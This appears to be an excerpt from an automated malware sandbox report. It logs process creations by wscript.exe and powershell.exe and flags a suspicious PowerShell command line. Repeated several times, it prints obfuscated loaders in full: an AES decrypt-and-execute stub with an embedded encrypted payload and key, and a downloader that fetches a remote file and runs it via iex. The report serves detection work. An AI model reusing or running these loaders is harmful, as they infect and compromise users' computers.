rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 